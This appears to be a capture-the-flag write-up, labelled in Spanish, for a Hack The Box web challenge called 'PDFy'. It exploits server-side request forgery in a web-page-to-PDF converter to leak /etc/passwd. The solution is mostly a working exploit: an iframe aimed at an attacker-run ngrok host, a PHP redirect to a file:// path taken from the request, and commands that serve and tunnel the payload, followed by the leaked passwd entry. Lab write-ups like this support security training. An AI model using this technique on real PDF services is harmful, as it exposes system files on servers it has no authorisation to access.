PDFy

Challenge Description

Welcome to PDFy, the exciting challenge where you turn your favorite web pages into portable PDF documents! It’s your chance to capture, share, and preserve the best of the internet with precision and creativity. Join us and transform the way we save and cherish web content! NOTE: Leak /etc/passwd to get the flag!

Categoria: Web
Dificultad: Fácil
Puntos: 30

Solution

Create index.html file.

<iframe src=https://7c36-187-190-198-228.ngrok-free.app/index.php?x=/etc/passwd width=1000px height=1000px></iframe>

Create index.php file.

<?php header('location:file://'.$_REQUEST['x']); ?>

Up php web server and ngrok server.

php -S 0.0.0.0:80
ngrok http 80

Send payload from web app.

https://7c36-187-190-198-228.ngrok-free.app/index.html

After the server create pdf file download and get the flag.

flaguser:x:1001:1001:HTB{pdF_g3n3r4t1on_g03s_brrr!},,,:/home/flaguser:/bin/bash

References

https://exploit-notes.hdks.org/exploit/web/security-risk/wkhtmltopdf-ssrf/